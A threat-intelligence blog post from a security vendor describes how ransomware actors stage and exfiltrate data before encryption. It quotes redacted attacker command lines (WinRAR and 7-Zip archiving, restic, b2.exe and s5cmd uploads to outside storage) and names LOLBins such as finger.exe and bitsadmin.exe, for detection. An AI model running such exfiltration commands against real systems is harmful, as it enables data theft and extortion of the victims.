Don’t let overlooked obligations become incidents. Learn how.
Utility navigation bar redirect icon
Portal LoginSupportContact
Search
Close search
Huntress Logo in Teal
  • Platform Overview
    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed EDR

    Get full endpoint visibility, detection, and response.

    Managed ITDR

    Protect your Microsoft 365 and Google Workspace identities and email environments.

    Managed ITDR

    Protect your Microsoft 365 and Google Workspace identities and email environments.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed SIEM

    Managed threat response and robust compliance support at a predictable price.

    Managed Security Awareness Training

    Empower your teams with science-backed security awareness training.

    Managed Security Awareness Training

    Empower your teams with science-backed security awareness training.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ISPM

    Continuous Microsoft 365 and identity hardening, managed and enforced by Huntress experts.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Managed ESPM

    Proactively secure endpoints against attacks.

    Integrations
    Integrations
    Support Documentation
    Support Documentation
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
    See Huntress in Action

    Quickly deploy and manage real-time protection for endpoints, email, and employees - all from a single dashboard.

    Huntress Cybersecurity
  • Threats We Stop
    Phishing
    Phishing
    Business Email Compromise
    Business Email Compromise
    Ransomware
    Ransomware
    Infostealers
    Infostealers
    View Allright arrowView Allright arrow
    Industries We Serve
    Education
    Education
    Financial Services
    Financial Services
    State and Local Government
    State and Local Government
    Healthcare
    Healthcare
    Law Firms
    Law Firms
    Manufacturing
    Manufacturing
    Utilities
    Utilities
    View Allright arrowView Allright arrow
    Tailored Solutions
    MSPs
    MSPs
    Resellers
    Resellers
    SMBs
    SMBs
    Compliance
    Compliance
    What Gets Overlooked Gets Exploited

    Most days, nothing happens. But one day, something will.

    Huntress Cybersecurity
    Cybercriminals Have Evolved

    Get the intel on today’s cybercriminal groups and learn how to protect yourself.

    Huntress Cybersecurity
  • Pricing
  • Community Series
    The Product Lab

    Shape the next big thing in cybersecurity together.

    The Product Lab

    Shape the next big thing in cybersecurity together.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Fireside Chat

    Real people. Real perspectives. Better conversations.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    Tradecraft Tuesday

    No products, no pitches – just tradecraft.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    _declassified

    Exposing hidden truths in the world of cybersecurity.

    Resources
    Upcoming Events
    Upcoming Events
    Ebooks
    Ebooks
    On-Demand Webinars
    On-Demand Webinars
    Videos
    Videos
    Whitepapers
    Whitepapers
    Datasheets
    Datasheets
    Cybersecurity Education
    Cybersecurity 101
    Cybersecurity 101
    Cybersecurity Guides
    Cybersecurity Guides
    Threat Library
    Threat Library
    Real Tradecraft, Real Results
    Real Tradecraft, Real Results
    2026 Cyber Threat Report
    2026 Cyber Threat Report
    The Huntress Blog
    Huntress Lands on the Microsoft Marketplace
    Huntress Cybersecurity
    Huntress Lands on the Microsoft Marketplace
    Huntress Cybersecurity
    How Huntress & DEFCERT Are Streamlining CMMC Assessment Prep
    Huntress Cybersecurity
    How Huntress & DEFCERT Are Streamlining CMMC Assessment Prep
    Huntress Cybersecurity
    Live Hacking Into Microsoft 365 with Kyle Hanslovan
    Huntress Cybersecurity
    Live Hacking Into Microsoft 365 with Kyle Hanslovan
    Huntress Cybersecurity
  • Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    Why Huntress

    Go beyond AI in the fight against today’s hackers with Huntress Managed EDR purpose-built for your needs

    Huntress Cybersecurity
    The Huntress SOC

    24/7 Security Operations Center

    The Huntress SOC

    24/7 Security Operations Center

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Reviews

    Why businesses of all sizes trust Huntress to defend their assets

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Case Studies

    Learn directly from our partners how Huntress has helped them

    Community

    Get in touch with the Huntress Community team

    Community

    Get in touch with the Huntress Community team

    Compare Huntress
    Bitdefender
    Bitdefender
    Blackpoint
    Blackpoint
    Breach Secure Now!
    Breach Secure Now!
    Crowdstrike
    Crowdstrike
    Datto
    Datto
    SentinelOne
    SentinelOne
    Sophos
    Sophos
    Compare Allright arrowCompare Allright arrow
  • HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    HUNTRESS HUB

    Login to access top-notch marketing resources, tools, and training.

    Huntress Cybersecurity
    Partners
    MSPs

    Join our partner community to deliver expert-led managed security.

    MSPs

    Join our partner community to deliver expert-led managed security.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Resellers

    Partner program designed to grow your cybersecurity business.

    Tech Alliances

    Driving innovation through global technology Partnerships

    Tech Alliances

    Driving innovation through global technology Partnerships

    Microsoft Partnership

    A Level-Up for Your Business Security

    Microsoft Partnership

    A Level-Up for Your Business Security

  • Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Press Release
    Huntress Announces Collaboration with Microsoft to Strengthen Cybersecurity for Businesses of All Sizes
    Huntress Cybersecurity
    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Our Story

    We're on a mission to shatter the barriers to enterprise-level security.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Newsroom

    Explore press releases, news articles, media interviews and more.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Meet the Team

    Founded by former NSA Cyber Operators. Backed by security researchers.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Careers

    Ready to shake up the cybersecurity world? Join the hunt.

    Awards
    Awards
    Contact Us
    Contact Us
  • Portal Login
  • Support
  • Contact
  • Search
  • Get a Demo
  • Start for Free
Portal LoginSupportContact
Search
Close search
Get a Demo
Start for Free
HomeBlog
Exposing Data Exfil: LOLBins, TTPs, and Binaries…Oh, My!
Published:
August 19, 2025

Exposing Data Exfil: LOLBins, TTPs, and Binaries…Oh, My!

By:
Harlan Carvey
Lindsey O'Donnell-Welch
Share icon
Glitch effectGlitch effectGlitch effect

Huntress frequently sees data staging and exfiltration activity, particularly with ransomware threat actors. These threat actors will collect, stage, and exfiltrate data prior to file encryption in order to engage in “double extortion” tactics. This means that if the impacted organization is not willing to pay the ransom to recover encrypted files, the threat actor will threaten to release the stolen data to further encourage payment. 

The purpose of this blog is to illustrate some examples of data staging and exfiltration activity observed by Huntress analysts rather than provide a comprehensive treatise of all possible actions that could be taken. As such, it’s possible that there are examples that do not appear in this blog; for example, copying data via the shared clipboard in a Remote Desktop Protocol (RDP) session, or the use of an FTP connection established via Windows Explorer. 

Our intention here is to bring awareness to the activity so it can be more easily understood. The hope is that this will help defenders determine more quickly whether certain events are legitimate or not. 



Figure 1: Different types of data staging and exfiltration techniques


Data staging: From archival tools to cloud storage sites

Very often, prior to data being exfiltrated out of an organization, it first has to be collected and staged. Threat actors often stage data through the use of archival tools; WinRAR and 7Zip are two such tools commonly observed across a wide range of incidents.

Not long ago, Huntress analysts observed the following 7Zip command line used to stage data, collecting it into an archive to be exfiltrated:

C:\Users\user\Downloads\7-ZipPortable\App\7-Zip64\7zG.exe a -i#7zMap19592:2148:7zEvent5339 -ad -saa -- "\\[REDACTED]\Data\Data”

This command line was then followed by the threat actor’s use of GoFile[.]io cloud storage. Huntress analysts have also observed the use of other cloud storage sites, such as MEGASync.

Other freely available tools, such as WinRAR, have also been observed being used by threat actors. Two observed command lines appear as follows:

WinRAR.exe  a -m5 -v3g -tn365d -n*.bmp -n*.doc -n*.docx -n*.xls -n*.xlsx -n*.pdf -n*.txt -hp[REDACTED] "C:\[REDACTED]\data.rar "C:\"

winrar.exe a -m0 -v3g -tn1000d -n*.txt -n*.pdf -n*.xls -n*.doc -n*.xlsx -n*.docx -hp[REDACTED] "C:\DATA\done\DATA.rar "C:\DATA"

Both of the above commands are used to “sweep up” a wide swath of files into an archive, ahead of exfiltrating the data. This activity is observed frequently enough that it’s often referred to as “...in preparation for data exfiltration…”, rather than explicitly “data staging”. 


Data exfiltration: LOLBins, backup utilities, and RClone

Data exfiltration can occur in a number of ways. For example, Huntress once observed a threat actor performing reconnaissance activities where they used the living-off-the-land binary (LOLBin) finger.exe to exfiltrate a process listing from an endpoint. Other native utilities, such as ftp.exe or bitsadmin.exe, have been used in a similar manner by threat actors to move data they’ve collected from the compromised endpoint to their own systems. 

As ransomware attacks roll out, there is often a focus by defenders on initial access or the noisier event of the ransomware deployment. However, data exfiltration is another important phase of incidents that can be difficult to detect. 

During several incidents, Huntress analysts have observed threat actors downloading and installing both WinRAR and FileZilla, ultimately exfiltrating staged data via fzsftp.exe, FileZilla’s SFTP module.

Other observed methods of data exfiltration include the use of RClone for syncing files to the cloud, or backup utilities such as Restic and BackBlaze. The following example command lines include Restic being observed during a BlackCat ransomware campaign, and BackBlaze (b2.exe) being observed during an INC ransomware incident, respectively:

restic.exe -r rest:http://[REDACTED]:8000/ --password-file ppp.txt --use-fs-snapshot --verbose backup \\[REDACTED]

\b2.exe  sync \\[REDACTED]\ b2://{REDACTED] --include-regex "(?i).*\.(doc|xls|xlsx|docx|pdf|csv)$|wallet\.dat$ --exclude-regex ".*" --keep-days 1826 --allow-empty-source --skip-hash-verification --exclude-all-symlinks --threads 30

Very often, tools for data staging are used in close combination with data exfiltration tools. During a recent incident, Huntress analysts observed the use of WinRAR for data staging, using a command such as the following: 

C:\Program Files\WinRAR\WinRAR.exe a -ep1  -scul -r0 -iext   -imon1 -- . D:\[REDACTED]...

The above command included an extensive list of folders to extract files from, and was followed shortly thereafter by the threat actor downloading, installing, and employing WinSCP. 


S5cmd for data exfiltration 

In a recent Qilin ransomware attack, Huntress observed threat actors using an open source tool named s5cmd. The use of s5cmd demonstrates that threat actors continue to find success in using freely available tools for data exfiltration to cloud resources. This tool is described on GitHub as “a high-performance command-line tool designed for interacting with S3-compatible object storage and local filesystems.” Reviewing the options available at the GitHub site, it appears to be a great option for copying files or “objects” from an endpoint to an S3 bucket.

In this attack, the threat actor accessed the infrastructure via an exposed (RDP) instance. They then used s5cmd.exe for data exfiltration before using PSExec to push the ransomware executable (svchosts.exe) and launch it on other endpoints. 


Figure 2: Breakdown of s5cmd features on GitHub page

While Huntress was deployed across 18 agents, the Windows Event Logs on one endpoint revealed significant details about the threat actor’s activity. For example, the Windows Defender Event Log contained a Microsoft-Windows-Windows Defender/5001 event, indicating that Windows Defender’s Real-Time Protection (RTP) functionality had been disabled. Shortly thereafter, there were a number of Microsoft-Windows-Windows Defender/5007 events indicating that additional Windows Defender functionality, such as SpyNetReporting, was also disabled. Prior to this activity, Windows Event Log messages included SecurityCenter/15;Windows Defender,SECURITY_PRODUCT_STATE_ON events; immediately following this activity, those messages changed to SecurityCenter/15;Windows Defender,SECURITY_PRODUCT_STATE_SNOOZED.

The threat actor ran the data exfiltration tool using the following command line:

s5cmd  --credentials-file credentials cp --include "*.pdf" --include "*.png" --include "*.jpg" --include "*.jpeg" --include "*.xls" --include "*.xlsx" --include "*.tif" --include "*.zip" --include "*.doc" --include "*.docx" "[Folder]" s3://[Resource]

This does not appear to be a one-off event—Huntress analysts observed a nearly identical s5cmd.exe command line during an incident that occurred five weeks prior to the incident described above.


Data exfiltration: Detection challenges

Huntress' 2025 Cyber Threat Report found that in ransomware attacks, attackers performed data exfiltration immediately prior to deploying the ransomware more than 70 percent of the time. 

Despite that fact, the process of actually detecting data exfiltration while it’s happening—outside of attackers explicitly telling victims in their ransom notes—can be difficult for defenders. Quickly and effectively detecting data staging and exfiltration often requires a detailed understanding of legitimate business processes, as otherwise, defenders run the risk of “crying wolf” due to a high rate of false positive detections.  


Most common activity prior to ransomware deployment
Figure 3: Data exfiltration is the most common activity prior to ransomware deployment

That’s because threat actors use techniques like copying data to a shared clipboard, or slip data through LOLBins like ftp.exe, finger.exe (for exfiltration), or bitsadmin.exe (for creating file upload jobs), which are often very similar to legitimate actions performed by system administrators. 

Defenders can keep tabs on behaviors linked to data staging and data exfiltration by monitoring for the specific activities outlined above, which are linked to various open-source tools, backup utilities, and more.




Categories
Threat Analysis
Summarize this postClose Speech Bubble
ChatGPTClaudePerplexityGoogle AI

Tune in to Tradecraft Tuesday

Join us every month for Tradecraft Tuesday, our live webinar where we expose hacker techniques and talk nerdy with live demos.
Secure your spot now.
Share
Facebook iconTwitter X iconLinkedin iconDownload icon
Glitch effect

You Might Also Like

  • Using Backup Utilities for Data Exfiltration

    “Double extortion” attacks, often perpetrated by ransomware threat actors, include data exfiltration prior to file encryption. Huntress analysts have observed various means of data exfiltration, but recently observed the use of a legitimate backup application seen by others to be associated with a Noberus/ALPHV ransomware affiliate.
  • What are LOLBins? How to Detect These Shady Malicious Threats

    Learn what LOLBins are, threats malicious threat actors can pose, how to detect those threats, and how to prevent them.
  • Can’t Touch This: Data Exfiltration via Finger

    Threat actors frequently make use of native utilities during incidents. However, this blog post discusses a rarely-observed means of data exfiltration.
  • Detecting Malicious Use of LOLBins, Pt. II

    Rhetoric within the cybersecurity community has leaned heavily towards threat actor use of LOLBins as a means of “hiding amongst the noise” of normal, administrative and operational activity. However, as Huntress SOC analysts can attest, this is often far from the case.
  • Not Location, Not Tunnel, but a Secret Third Thing: Datacenter Infrastructure & Identity Attacks

    Do you know where identity attacks come from? It’s not just location or VPNs, but there’s a "secret third thing" in identity attacks. See how a new AS-based detection system closed this critical visibility gap.
  • Kawabunga, Dude, You’ve Been Ransomed!

    Thanks in large part to our customer base, Huntress sees a great deal of interesting activity, particularly from threat actors (but also from admins). Part of that activity includes not just ransomware variants that Huntress hasn’t seen before, but also variants that may not have been documented via any public means. Further, when these incidents occur, Huntress very often gets a detailed look at the threat actor’s activity, including commands and their timing.
  • Sector Spotlight: Threats Plaguing Education

    Threat actors are targeting the education sector with data breaches, phishing emails, ransomware hits, brute force RDP attacks, and more.
  • Keeping up with BlueKeep

    Remote Desktop Services (RDS) benefit employees and IT administrators alike. With employees often working from anywhere, remote desktop reduces the physical burden of carrying a work laptop home 🏠. It also makes updating and managing systems easier, which can alleviate the administrative burden when handling a large network.

Sign Up for Huntress Updates

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.
Privacy • Terms
By submitting this form, you accept our Terms of Service & Privacy Policy
Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form.
Huntress Managed Security PlatformManaged EDRManaged EDR for macOSManaged EDR for LinuxManaged ITDRManaged SIEMManaged Security Awareness TrainingManaged ISPMManaged ESPMBook a Demo
PhishingComplianceBusiness Email CompromiseEducationFinanceHealthcareManufacturingState & Local Government
Managed Service ProvidersResellersIT & Security Teams24/7 SOCCase Studies
BlogResource CenterCybersecurity 101Upcoming EventsSupport Documentation
Our CompanyLeadershipNews & PressCareersContact Us
Huntress white logo

Protecting 242k+ customers like you with enterprise-grade protection.

Privacy PolicyCookie PolicyTerms of UseCookie Consent
Linkedin iconTwitter X iconYouTube iconInstagram icon
© 2025 Huntress All Rights Reserved.

Join the Hunt

Get insider access to Huntress tradecraft, killer events, and the freshest blog updates.

By submitting this form, you accept our Terms of Service & Privacy Policy